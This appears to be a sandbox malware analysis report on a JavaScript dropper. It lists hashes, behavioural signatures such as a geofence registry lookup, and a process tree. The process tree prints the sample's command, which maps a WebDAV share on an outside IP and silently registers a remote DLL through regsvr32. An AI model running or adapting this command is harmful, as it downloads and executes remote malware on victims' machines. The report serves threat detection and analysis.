Analysis
-
max time kernel
145s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
23/07/2024, 02:13
Static task
static1
Behavioral task
behavioral1
Sample
210171615333798003.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
210171615333798003.js
Resource
win10v2004-20240709-en
General
-
Target
210171615333798003.js
-
Size
4KB
-
MD5
88a4e5598a9b2b39eb791118204c9508
-
SHA1
ebb6a9d5346ee65d302bcdb37f4fbfaf284f88c0
-
SHA256
64c6b40b3dbd75803044e42527f7f1c2a0f5274d9362d8ae290ba150737a68fb
-
SHA512
7341e509f21d19994ce35df26450194bd8767acee2d5f4625b2117b3f77df03f7c157f9ab4752158ce753b0be0a41c9f63ddd036cd804b83c5d20b765c97cf68
-
SSDEEP
96:mA+oJRe+GQuVEuK4wRenreeeUUdAk7SRenreeeUUdTevvhjReCRegvv:h++e+ZuVEuK4kenreeeUKAkGenreeeUR
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3020 wrote to memory of 4352 3020 wscript.exe 84 PID 3020 wrote to memory of 4352 3020 wscript.exe 84 PID 4352 wrote to memory of 1948 4352 cmd.exe 86 PID 4352 wrote to memory of 1948 4352 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\210171615333798003.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\288702201919570.dll2⤵
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:1948
-
-